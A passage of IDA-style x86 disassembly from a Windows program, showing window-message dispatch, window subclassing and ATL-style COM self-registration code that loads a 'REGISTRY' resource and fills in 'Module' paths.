jnz loc_4049F3
mov eax, [esp+4+arg_4]
cmp eax, 110h
jnz short loc_4048CF
mov edx, [esp+4+arg_C]
lea eax, [esp+4+arg_14]
push eax
mov eax, [esp+8+arg_8]
push edx
push eax
mov esi, 1
push 110h
mov [esp+14h+arg_14], esi
call sub_407D40
jmp loc_4049DF
; ---------------------------------------------------------------------------
loc_4048CF: ; CODE XREF: sub_404890+16�j
cmp eax, 111h
jnz short loc_404901
mov eax, [esp+4+arg_8]
mov esi, 1
cmp ax, si
jnz short loc_40492A
lea edx, [esp+4+arg_14]
push edx
mov edx, [esp+8+arg_C]
push edx
push esi
shr eax, 10h
push eax
mov [esp+14h+arg_14], esi
call sub_406110
jmp loc_4049DF
; ---------------------------------------------------------------------------
loc_404901: ; CODE XREF: sub_404890+44�j
cmp eax, 10h
jnz short loc_40495A
mov eax, [esp+4+arg_C]
lea edx, [esp+4+arg_14]
push edx
mov edx, [esp+8+arg_8]
push eax
push edx
mov esi, 1
push 10h
mov [esp+14h+arg_14], esi
call sub_405EB0
jmp loc_4049DF
; ---------------------------------------------------------------------------
loc_40492A: ; CODE XREF: sub_404890+52�j
cmp ax, 0C9h
jnz short loc_404989
shr eax, 10h
cmp ax, si
jnz loc_4049F3
mov eax, [esp+4+arg_C]
lea edx, [esp+4+arg_14]
push edx
push eax
push 0C9h
push esi
mov [esp+14h+arg_14], esi
call sub_405F00
jmp loc_4049DF
; ---------------------------------------------------------------------------
loc_40495A: ; CODE XREF: sub_404890+74�j
cmp eax, 113h
jnz loc_4049F3
mov eax, [esp+4+arg_C]
lea edx, [esp+4+arg_14]
push edx
mov edx, [esp+8+arg_8]
push eax
push edx
mov esi, 1
push 113h
mov [esp+14h+arg_14], esi
call sub_408350
jmp short loc_4049DF
; ---------------------------------------------------------------------------
loc_404989: ; CODE XREF: sub_404890+9E�j
cmp ax, 0CEh
jnz short loc_4049B7
shr eax, 10h
cmp ax, 400h
jnz short loc_4049F3
mov eax, [esp+4+arg_C]
lea edx, [esp+4+arg_14]
push edx
push eax
push 0CEh
push 400h
mov [esp+14h+arg_14], esi
call sub_407AA0
jmp short loc_4049DF
; ---------------------------------------------------------------------------
loc_4049B7: ; CODE XREF: sub_404890+FD�j
cmp ax, 0D1h
jnz short loc_4049F3
shr eax, 10h
test ax, ax
jnz short loc_4049F3
mov eax, [esp+4+arg_C]
lea edx, [esp+4+arg_14]
push edx
push eax
push 0D1h
push 0
mov [esp+14h+arg_14], esi
call sub_406200
loc_4049DF: ; CODE XREF: sub_404890+3A�j
; sub_404890+6C�j ...
mov ecx, [esp+4+arg_10]
mov [ecx], eax
mov eax, [esp+4+arg_14]
test eax, eax
jz short loc_4049F3
mov eax, esi
pop esi
retn 18h
; ---------------------------------------------------------------------------
loc_4049F3: ; CODE XREF: sub_404890+7�j
; sub_404890+A6�j ...
xor eax, eax
pop esi
retn 18h
sub_404890 endp
; ---------------------------------------------------------------------------
align 10h
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_404A10 proc near ; DATA XREF: .rdata:0040F674�o
mov eax, offset sub_404A20
retn
sub_404A10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404A20 proc near ; DATA XREF: sub_404A10�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 24h
mov edx, [esp+24h+arg_C]
mov ecx, [esp+24h+arg_8]
push ebx
push ebp
push esi
mov esi, [esp+30h+arg_0]
mov ebp, [esi+18h]
mov eax, [esi+4]
push edi
mov edi, [esp+34h+arg_4]
xor ebx, ebx
push ebx
mov [esp+38h+var_14], ebx
mov [esp+38h+var_C], ebx
mov [esp+38h+var_10], ebx
lea ebx, [esp+38h+arg_0]
push ebx
push edx
push ecx
mov [esp+44h+arg_4], ebp
lea ebp, [esp+44h+var_24]
push edi
mov [esp+48h+var_1C], ecx
mov [esi+18h], ebp
mov ebp, [esi]
push eax
mov ecx, esi
mov [esp+4Ch+var_8], 24h
mov [esp+4Ch+var_4], 1
mov [esp+4Ch+var_24], eax
mov [esp+4Ch+var_20], edi
mov [esp+4Ch+var_18], edx
call dword ptr [ebp+0]
mov ebx, eax
test ebx, ebx
mov eax, [esp+34h+arg_4]
mov [esi+18h], eax
jz short loc_404ADB
cmp edi, 39h
ja short loc_404AB0
jz short loc_404AAA
cmp edi, 2Eh
jb short loc_404AC8
cmp edi, 2Fh
jbe short loc_404AAA
cmp edi, 37h
jnz short loc_404AC8
loc_404AAA: ; CODE XREF: sub_404A20+79�j
; sub_404A20+83�j ...
mov ebx, [esp+34h+arg_0]
jmp short loc_404AE7
; ---------------------------------------------------------------------------
loc_404AB0: ; CODE XREF: sub_404A20+77�j
cmp edi, 110h
jz short loc_404AAA
cmp edi, 131h
jbe short loc_404AC8
cmp edi, 138h
jbe short loc_404AAA
loc_404AC8: ; CODE XREF: sub_404A20+7E�j
; sub_404A20+88�j ...
mov ecx, [esp+34h+arg_0]
mov edx, [esi+4]
push ecx
push 0
push edx
call ds:dword_40F22C ; SetWindowLongA
jmp short loc_404AE7
; ---------------------------------------------------------------------------
loc_404ADB: ; CODE XREF: sub_404A20+72�j
cmp edi, 82h
jnz short loc_404AE7
or dword ptr [esi+1Ch], 1
loc_404AE7: ; CODE XREF: sub_404A20+8E�j
; sub_404A20+B9�j ...
mov eax, [esi+1Ch]
test al, 1
jz short loc_404B0D
mov ecx, [esi+18h]
test ecx, ecx
jnz short loc_404B0D
mov ecx, [esi+4]
and eax, 0FFFFFFFEh
mov [esi+1Ch], eax
mov eax, [esi]
push ecx
mov ecx, esi
mov dword ptr [esi+4], 0
call dword ptr [eax+0Ch]
loc_404B0D: ; CODE XREF: sub_404A20+CC�j
; sub_404A20+D3�j
pop edi
pop esi
pop ebp
mov eax, ebx
pop ebx
add esp, 24h
retn 10h
sub_404A20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_404B20(void *Memory,char)
sub_404B20 proc near ; DATA XREF: .rdata:0040F670�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
lea ecx, [esi+24h]
mov dword ptr [esi], offset off_40F66C
call sub_408910
mov ecx, esi
call sub_403030
test [esp+4+arg_0], 1
jz short loc_404B48
push esi ; Memory
call j__free
add esp, 4
loc_404B48: ; CODE XREF: sub_404B20+1D�j
mov eax, esi
pop esi
retn 4
sub_404B20 endp
; ---------------------------------------------------------------------------
align 10h
loc_404B50: ; DATA XREF: WinMain(x,x,x,x)+19F�o
push esi
push edi
push offset dword_412044
call sub_402EC0
mov edi, [esp+0Ch]
mov esi, eax
mov eax, [esi]
push esi
mov ecx, esi
mov [esi+4], edi
call dword ptr [eax+8]
push eax
lea ecx, [esi+8]
call sub_401C00
mov esi, [esi+14h]
push esi
push 4
push edi
call ds:dword_40F22C ; SetWindowLongA
mov ecx, [esp+18h]
mov edx, [esp+14h]
mov eax, [esp+10h]
push ecx
push edx
push eax
push edi
call esi ; lstrcmpi
pop edi
pop esi
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404BA0 proc near ; CODE XREF: sub_404CD0+198�p
var_1004 = dword ptr -1004h
var_1000 = byte ptr -1000h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, 1004h
call __alloca_probe
push esi
push edi
mov edi, ecx
mov ecx, [esp+100Ch+arg_0]
lea eax, [esp+100Ch+var_1004]
push eax
push ecx
mov ecx, edi
mov [esp+1014h+var_1004], 0
call sub_4025B0
mov esi, eax
test esi, esi
jl loc_404C8B
mov eax, [esp+100Ch+var_1004]
mov [edi], eax
cmp byte ptr [eax], 0
jz loc_404C80
push ebx
push ebp
loc_404BE5: ; CODE XREF: sub_404BA0+119�j
lea edx, [esp+1014h+var_1000]
push edx
mov ecx, edi
call sub_401810
mov esi, eax
test esi, esi
jl loc_404C7E
xor esi, esi
lea ecx, [ecx+0]
loc_404C00: ; CODE XREF: sub_404BA0+7B�j
mov eax, ds:off_40F498[esi*8]
push eax
lea ecx, [esp+1018h+var_1000]
push ecx
call ds:dword_40F088 ; lstrcmpi
test eax, eax
jz short loc_404C24
inc esi
cmp esi, 0Eh
jb short loc_404C00
loc_404C1D: ; CODE XREF: sub_404BA0+8D�j
; sub_404BA0+A6�j
mov esi, 80020009h
jmp short loc_404C7E
; ---------------------------------------------------------------------------
loc_404C24: ; CODE XREF: sub_404BA0+75�j
mov ebp, ds:dword_40F49C[esi*8]
test ebp, ebp
jz short loc_404C1D
lea edx, [esp+1014h+var_1000]
push edx
mov ecx, edi
call sub_401810
mov esi, eax
test esi, esi
jl short loc_404C7E
cmp [esp+1014h+var_1000], 7Bh
jnz short loc_404C1D
mov eax, [esp+1014h+arg_4]
test eax, eax
push 0
jz short loc_404C98
mov ebx, [edi]
push eax
push ebp
lea eax, [esp+1020h+var_1000]
push eax
mov ecx, edi
call sub_404100
mov esi, eax
test esi, esi
jge short loc_404CAD
push 0
push 0
push ebp
lea eax, [esp+1020h+var_1000]
push eax
mov ecx, edi
mov [edi], ebx
call sub_404100
loc_404C7E: ; CODE XREF: sub_404BA0+55�j
; sub_404BA0+82�j ...
pop ebp
pop ebx
loc_404C80: ; CODE XREF: sub_404BA0+3D�j
mov ecx, [esp+100Ch+var_1004]
push ecx
call ds:dword_40F260
loc_404C8B: ; CODE XREF: sub_404BA0+2E�j
pop edi
mov eax, esi
pop esi
add esp, 1004h
retn 8
; ---------------------------------------------------------------------------
loc_404C98: ; CODE XREF: sub_404BA0+B3�j
push 0
push ebp
lea ecx, [esp+1020h+var_1000]
push ecx
mov ecx, edi
call sub_404100
mov esi, eax
test esi, esi
jl short loc_404C7E
loc_404CAD: ; CODE XREF: sub_404BA0+C9�j
mov ecx, edi
call sub_4017B0
mov edx, [edi]
cmp byte ptr [edx], 0
jnz loc_404BE5
jmp short loc_404C7E
sub_404BA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CD0 proc near ; CODE XREF: sub_404EC0+C7�p
; sub_404FC0+C7�p ...
var_410 = dword ptr -410h
var_40C = byte ptr -40Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 410h
push ebx
push esi
push edi
mov esi, ecx
call off_412040
xor ebx, ebx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
cmp eax, ebx
mov [ebp+var_8], esi
mov [ebp+var_C], ebx
mov [ebp+var_410], ebx
jz short loc_404D6F
push eax
call ds:dword_40F040 ; lstrlenW
lea edi, [eax+eax+2]
cmp edi, 400h
jg short loc_404D2D
push edi
call sub_4010B0
add esp, 4
test al, al
jz short loc_404D2D
mov eax, edi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov esi, esp
jmp short loc_404D48
; ---------------------------------------------------------------------------
loc_404D2D: ; CODE XREF: sub_404CD0+3D�j
; sub_404CD0+4A�j
lea eax, [edi+8]
push eax ; Size
call _malloc
add esp, 4
test eax, eax
jz short loc_404D6F
mov dword ptr [eax], 0
mov ebx, eax
lea esi, [eax+8]
loc_404D48: ; CODE XREF: sub_404CD0+5B�j
test esi, esi
jz short loc_404D6F
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_4]
push 0
push 0
push edi
push esi
push 0FFFFFFFFh
push ecx
push 0
push edx
mov byte ptr [esi], 0
call ds:dword_40F03C ; WideCharToMultiByte
neg eax
sbb eax, eax
and eax, esi
jmp short loc_404D71
; ---------------------------------------------------------------------------
loc_404D6F: ; CODE XREF: sub_404CD0+2A�j
; sub_404CD0+6B�j ...
xor eax, eax
loc_404D71: ; CODE XREF: sub_404CD0+9D�j
test eax, eax
jnz short loc_404DB9
mov ecx, [ebp+var_410]
lea eax, [ebp+var_40C]
cmp ecx, eax
jz short loc_404D90
lea ecx, [ebp+var_410]
call sub_401CD0
loc_404D90: ; CODE XREF: sub_404CD0+B3�j
test ebx, ebx
jz short loc_404DA5
loc_404D94: ; CODE XREF: sub_404CD0+D3�j
mov eax, ebx
mov ebx, [ebx]
push eax ; Memory
call _free
add esp, 4
test ebx, ebx
jnz short loc_404D94
loc_404DA5: ; CODE XREF: sub_404CD0+C2�j
mov eax, 8007000Eh
lea esp, [ebp-41Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_404DB9: ; CODE XREF: sub_404CD0+A3�j
push 2
push 0
push eax
call ds:dword_40F0CC ; LoadLibraryExA
mov esi, eax
test esi, esi
mov [ebp+var_4], esi
jnz short loc_404DD9
call sub_4013E0
mov edi, eax
jmp loc_404E79
; ---------------------------------------------------------------------------
loc_404DD9: ; CODE XREF: sub_404CD0+FB�j
mov ecx, [ebp+arg_8]
mov edx, [ebp+arg_4]
push ecx
push edx
push esi
call ds:dword_40F064 ; FindResourceA
mov edi, eax
test edi, edi
jnz short loc_404DF5
call sub_4013E0
jmp short loc_404E70
; ---------------------------------------------------------------------------
loc_404DF5: ; CODE XREF: sub_404CD0+11C�j
push edi
push esi
call ds:dword_40F060 ; LoadResource
test eax, eax
mov [ebp+arg_0], eax
jnz short loc_404E0B
call sub_4013E0
jmp short loc_404E70
; ---------------------------------------------------------------------------
loc_404E0B: ; CODE XREF: sub_404CD0+132�j
push edi
push esi
call ds:dword_40F058 ; SizeofResource
mov edi, eax
lea eax, [edi+1]
push eax ; Size
lea ecx, [ebp+var_410]
mov [ebp+arg_8], edi
call sub_402FD0
mov eax, [ebp+var_410]
test eax, eax
jnz short loc_404E38
mov edi, 8007000Eh
jmp short loc_404E72
; ---------------------------------------------------------------------------
loc_404E38: ; CODE XREF: sub_404CD0+15F�j
mov esi, [ebp+arg_0]
mov ecx, edi
mov edx, ecx
shr ecx, 2
mov edi, eax
rep movsd
mov ecx, edx
mov edx, [ebp+arg_C]
and ecx, 3
rep movsb
mov eax, [ebp+var_410]
mov ecx, [ebp+arg_8]
mov byte ptr [ecx+eax], 0
mov eax, [ebp+var_410]
push edx
push eax
lea ecx, [ebp+var_C]
call sub_404BA0
mov esi, [ebp+var_4]
loc_404E70: ; CODE XREF: sub_404CD0+123�j
; sub_404CD0+139�j
mov edi, eax
loc_404E72: ; CODE XREF: sub_404CD0+166�j
push esi
call ds:dword_40F0C8 ; FreeLibrary
loc_404E79: ; CODE XREF: sub_404CD0+104�j
mov eax, [ebp+var_410]
lea ecx, [ebp+var_40C]
cmp eax, ecx
jz short loc_404E94
lea ecx, [ebp+var_410]
call sub_401CD0
loc_404E94: ; CODE XREF: sub_404CD0+1B7�j
test ebx, ebx
jz short loc_404EA9
loc_404E98: ; CODE XREF: sub_404CD0+1D7�j
mov eax, ebx
mov ebx, [ebx]
push eax ; Memory
call _free
add esp, 4
test ebx, ebx
jnz short loc_404E98
loc_404EA9: ; CODE XREF: sub_404CD0+1C6�j
mov eax, edi
lea esp, [ebp-41Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_404CD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404EC0 proc near ; CODE XREF: sub_4050C0+21B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call off_412040
mov [ebp+var_4], eax
mov eax, [ebp+arg_C]
xor esi, esi
test eax, eax
jz short loc_404F4C
push eax
call ds:dword_40F040 ; lstrlenW
lea ebx, [eax+eax+2]
cmp ebx, 400h
jg short loc_404F0A
push ebx
call sub_4010B0
add esp, 4
test al, al
jz short loc_404F0A
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov edi, esp
jmp short loc_404F25
; ---------------------------------------------------------------------------
loc_404F0A: ; CODE XREF: sub_404EC0+2A�j
; sub_404EC0+37�j
lea eax, [ebx+8]
push eax ; Size
call _malloc
add esp, 4
test eax, eax
jz short loc_404F4C
mov dword ptr [eax], 0
mov esi, eax
lea edi, [eax+8]
loc_404F25: ; CODE XREF: sub_404EC0+48�j
test edi, edi
jz short loc_404F4C
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_4]
push 0
push 0
push ebx
push edi
push 0FFFFFFFFh
push ecx
push 0
push edx
mov byte ptr [edi], 0
call ds:dword_40F03C ; WideCharToMultiByte
neg eax
sbb eax, eax
and eax, edi
jmp short loc_404F4E
; ---------------------------------------------------------------------------
loc_404F4C: ; CODE XREF: sub_404EC0+17�j
; sub_404EC0+58�j ...
xor eax, eax
loc_404F4E: ; CODE XREF: sub_404EC0+8A�j
test eax, eax
jnz short loc_404F78
test esi, esi
jz short loc_404F67
loc_404F56: ; CODE XREF: sub_404EC0+A5�j
mov eax, esi
mov esi, [esi]
push eax ; Memory
call _free
add esp, 4
test esi, esi
jnz short loc_404F56
loc_404F67: ; CODE XREF: sub_404EC0+94�j
mov eax, 8007000Eh
lea esp, [ebp-10h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_404F78: ; CODE XREF: sub_404EC0+90�j
mov ecx, [ebp+arg_4]
push 1
push eax
movzx eax, [ebp+arg_8]
push eax
push ecx
mov ecx, [ebp+arg_0]
call sub_404CD0
test esi, esi
mov edi, eax
jz short loc_404FA3
loc_404F92: ; CODE XREF: sub_404EC0+E1�j
mov eax, esi
mov esi, [esi]
push eax ; Memory
call _free
add esp, 4
test esi, esi
jnz short loc_404F92
loc_404FA3: ; CODE XREF: sub_404EC0+D0�j
mov eax, edi
lea esp, [ebp-10h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_404EC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FC0 proc near ; CODE XREF: sub_4050C0+22B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call off_412040
mov [ebp+var_4], eax
mov eax, [ebp+arg_C]
xor esi, esi
test eax, eax
jz short loc_40504C
push eax
call ds:dword_40F040 ; lstrlenW
lea ebx, [eax+eax+2]
cmp ebx, 400h
jg short loc_40500A
push ebx
call sub_4010B0
add esp, 4
test al, al
jz short loc_40500A
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov edi, esp
jmp short loc_405025
; ---------------------------------------------------------------------------
loc_40500A: ; CODE XREF: sub_404FC0+2A�j
; sub_404FC0+37�j
lea eax, [ebx+8]
push eax ; Size
call _malloc
add esp, 4
test eax, eax
jz short loc_40504C
mov dword ptr [eax], 0
mov esi, eax
lea edi, [eax+8]
loc_405025: ; CODE XREF: sub_404FC0+48�j
test edi, edi
jz short loc_40504C
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_4]
push 0
push 0
push ebx
push edi
push 0FFFFFFFFh
push ecx
push 0
push edx
mov byte ptr [edi], 0
call ds:dword_40F03C ; WideCharToMultiByte
neg eax
sbb eax, eax
and eax, edi
jmp short loc_40504E
; ---------------------------------------------------------------------------
loc_40504C: ; CODE XREF: sub_404FC0+17�j
; sub_404FC0+58�j ...
xor eax, eax
loc_40504E: ; CODE XREF: sub_404FC0+8A�j
test eax, eax
jnz short loc_405078
test esi, esi
jz short loc_405067
loc_405056: ; CODE XREF: sub_404FC0+A5�j
mov eax, esi
mov esi, [esi]
push eax ; Memory
call _free
add esp, 4
test esi, esi
jnz short loc_405056
loc_405067: ; CODE XREF: sub_404FC0+94�j
mov eax, 8007000Eh
lea esp, [ebp-10h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_405078: ; CODE XREF: sub_404FC0+90�j
mov ecx, [ebp+arg_4]
push 0
push eax
movzx eax, [ebp+arg_8]
push eax
push ecx
mov ecx, [ebp+arg_0]
call sub_404CD0
test esi, esi
mov edi, eax
jz short loc_4050A3
loc_405092: ; CODE XREF: sub_404FC0+E1�j
mov eax, esi
mov esi, [esi]
push eax ; Memory
call _free
add esp, 4
test esi, esi
jnz short loc_405092
loc_4050A3: ; CODE XREF: sub_404FC0+D0�j
mov eax, edi
lea esp, [ebp-10h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_404FC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4050C0 proc near ; CODE XREF: sub_405920�j
; WinMain(x,x,x,x)+A6�p ...
var_940 = byte ptr -940h
var_530 = word ptr -530h
var_52E = word ptr -52Eh
var_118 = byte ptr -118h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 940h
push ebx
push esi
mov esi, [ebp+arg_C]
push edi
xor edi, edi
cmp esi, edi
mov [ebp+var_14], offset off_40F528
mov [ebp+var_10], edi
mov [ebp+var_C], edi
mov [ebp+var_8], edi
jz short loc_405108
mov eax, [esi]
cmp eax, edi
jz short loc_405108
jmp short loc_4050F0
; ---------------------------------------------------------------------------
align 10h
loc_4050F0: ; CODE XREF: sub_4050C0+2B�j
; sub_4050C0+46�j
mov ecx, [esi+4]
push ecx
push eax
lea edx, [ebp+var_14]
push edx
call sub_403CA0
mov eax, [esi+8]
add esi, 8
cmp eax, edi
jnz short loc_4050F0
loc_405108: ; CODE XREF: sub_4050C0+23�j
; sub_4050C0+29�j
mov ecx, [ebp+arg_0]
mov eax, [ecx]
lea edx, [ebp+var_14]
push edx
call dword ptr [eax+14h]
mov esi, eax
cmp esi, edi
jl loc_4052FA
call off_412040
mov ebx, dword_41256C
mov [ebp+arg_0], eax
push 104h
lea eax, [ebp+var_118]
push eax
push ebx
mov [ebp+arg_C], edi
call ds:dword_40F0A4 ; GetModuleFileNameA
cmp eax, edi
jnz short loc_405153
call sub_4013E0
mov esi, eax
jmp loc_4052FA
; ---------------------------------------------------------------------------
loc_405153: ; CODE XREF: sub_4050C0+85�j
cmp eax, 104h
jnz short loc_40517E
lea ecx, [ebp+arg_C]
call sub_401C60
lea ecx, [ebp+var_14]
call sub_4024D0
mov eax, 8007007Ah
lea esp, [ebp-94Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_40517E: ; CODE XREF: sub_4050C0+98�j
lea ecx, [ebp+var_118]
push ecx
call ds:dword_40F084 ; lstrlen
mov esi, eax
inc esi
lea edi, [esi+esi]
cmp edi, 400h
ja short loc_4051B7
push edi
call sub_4010B0
add esp, 4
test al, al
jz short loc_4051B7
mov eax, edi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov eax, esp
jmp short loc_4051C0
; ---------------------------------------------------------------------------
loc_4051B7: ; CODE XREF: sub_4050C0+D7�j
; sub_4050C0+E4�j
push edi
lea ecx, [ebp+arg_C]
call sub_4022E0
loc_4051C0: ; CODE XREF: sub_4050C0+F5�j
mov edx, [ebp+arg_0]
push edx
push esi
lea ecx, [ebp+var_118]
push ecx
push eax
call sub_401200
mov esi, eax
test esi, esi
jnz short loc_4051FC
lea ecx, [ebp+arg_C]
call sub_401C60
lea ecx, [ebp+var_14]
call sub_4024D0
mov eax, 8007000Eh
lea esp, [ebp-94Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_4051FC: ; CODE XREF: sub_4050C0+116�j
lea edx, [ebp+var_940]
push esi
push edx
call sub_401490
add esp, 8
test ebx, ebx
jz short loc_40522E
push 0
call ds:dword_40F0D0 ; GetModuleHandleA
cmp ebx, eax
jz short loc_40522E
lea eax, [ebp+var_940]
push eax
push offset aModule ; "Module"
lea ecx, [ebp+var_14]
push ecx
jmp short loc_40527F
; ---------------------------------------------------------------------------
loc_40522E: ; CODE XREF: sub_4050C0+14E�j
; sub_4050C0+15A�j
lea edx, [ebp+var_940]
push edx
lea eax, [ebp+var_52E]
mov edi, 22h
push eax
mov [ebp+var_530], di
call sub_401280
add esp, 8
lea ecx, [ebp+var_530]
push ecx
call ds:dword_40F040 ; lstrlenW
lea edx, [ebp+var_530]
push edx
mov [ebp+eax*2+var_530], di
mov [ebp+eax*2+var_52E], 0
push offset aModule ; "Module"
lea eax, [ebp+var_14]
push eax
loc_40527F: ; CODE XREF: sub_4050C0+16C�j
call sub_403CA0
mov edi, eax
test edi, edi
jl short loc_4052A5
lea ecx, [ebp+var_940]
push ecx
push offset aModule_raw ; "Module_Raw"
lea edx, [ebp+var_14]
push edx
call sub_403CA0
mov edi, eax
test edi, edi
jge short loc_4052C6
loc_4052A5: ; CODE XREF: sub_4050C0+1C8�j
lea ecx, [ebp+arg_C]
call sub_401C60
lea ecx, [ebp+var_14]
call sub_4024D0
mov eax, edi
lea esp, [ebp-94Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_4052C6: ; CODE XREF: sub_4050C0+1E3�j
mov eax, [ebp+arg_8]
test eax, eax
push offset aRegistry ; "REGISTRY"
jz short loc_4052E2
mov eax, [ebp+arg_4]
push eax
push esi
lea ecx, [ebp+var_14]
push ecx
call sub_404EC0
jmp short loc_4052F0
; ---------------------------------------------------------------------------
loc_4052E2: ; CODE XREF: sub_4050C0+210�j
mov edx, [ebp+arg_4]
push edx
push esi
lea eax, [ebp+var_14]
push eax
call sub_404FC0
loc_4052F0: ; CODE XREF: sub_4050C0+220�j
lea ecx, [ebp+arg_C]
mov esi, eax
call sub_401C60
loc_4052FA: ; CODE XREF: sub_4050C0+58�j
; sub_4050C0+8E�j
lea ecx, [ebp+var_14]
call sub_4024D0
mov eax, esi
lea esp, [ebp-94Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_4050C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405320 proc near ; CODE XREF: WinMain(x,x,x,x)+DB�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [ecx+2Ch]
push ebp
mov ebp, [esp+8+arg_4]
push esi
xor eax, eax
test ebx, ebx
push edi
jz short loc_405371
mov edi, [ebx]
test edi, edi
jz short loc_405371
loc_405337: ; CODE XREF: sub_405320+4B�j
test ebp, ebp
jz short loc_405348
mov ecx, 4
mov esi, ebp
xor edx, edx
repe cmpsd
jnz short loc_405363
loc_405348: ; CODE XREF: sub_405320+19�j
push 1
call dword ptr [ebx+4]
test eax, eax
jl short loc_40539B
push 1
call dword ptr [ebx+1Ch]
push eax
mov eax, [ebx]
push eax
call sub_402B60
test eax, eax
jl short loc_40539B
loc_405363: ; CODE XREF: sub_405320+26�j
mov edi, [ebx+24h]
add ebx, 24h
test edi, edi
jnz short loc_405337
test eax, eax
jl short loc_40539B
loc_405371: ; CODE XREF: sub_405320+F�j
; sub_405320+15�j
mov ecx, [esp+10h+arg_0]
push ebp
push ecx
push offset dword_412540
call sub_404730
test eax, eax
jl short loc_40539B
mov ecx, dword_4124DC
test ecx, ecx
jz short loc_40539B
mov edx, dword_41256C
push edx
call ecx
add esp, 4
loc_40539B: ; CODE XREF: sub_405320+2F�j
; sub_405320+41�j ...
pop edi
pop esi
pop ebp
pop ebx
retn 8
sub_405320 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4053B0 proc near ; CODE XREF: WinMain(x,x,x,x)+B4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [ecx+2Ch]
push ebp
mov ebp, [esp+8+arg_4]
push esi
xor eax, eax
test ebx, ebx
push edi
jz short loc_405401
mov edi, [ebx]
test edi, edi
jz short loc_405401
loc_4053C7: ; CODE XREF: sub_4053B0+4B�j
test ebp, ebp
jz short loc_4053D8
mov ecx, 4
mov esi, ebp
xor edx, edx
repe cmpsd
jnz short loc_4053F3
loc_4053D8: ; CODE XREF: sub_4053B0+19�j
push 0
call dword ptr [ebx+1Ch]
push eax
mov eax, [ebx]
push eax
call sub_402B60
test eax, eax
jl short loc_405420
push 0
call dword ptr [ebx+4]
test eax, eax
jl short loc_405420
loc_4053F3: ; CODE XREF: sub_4053B0+26�j
mov edi, [ebx+24h]
add ebx, 24h
test edi, edi
jnz short loc_4053C7
test eax, eax
jl short loc_405420
loc_405401: ; CODE XREF: sub_4053B0+F�j
; sub_4053B0+15�j
mov eax, dword_4124D8
test eax, eax
jz short loc_405410
call eax
test eax, eax
jl short loc_405420
loc_405410: ; CODE XREF: sub_4053B0+58�j
mov ecx, [esp+10h+arg_0]
push ebp
push ecx
push offset dword_412540
call sub_4047C0
loc_405420: ; CODE XREF: sub_4053B0+38�j
; sub_4053B0+41�j ...
pop edi
pop esi
pop ebp
pop ebx
retn 8
sub_4053B0 endp
; ---------------------------------------------------------------------------
align 10h
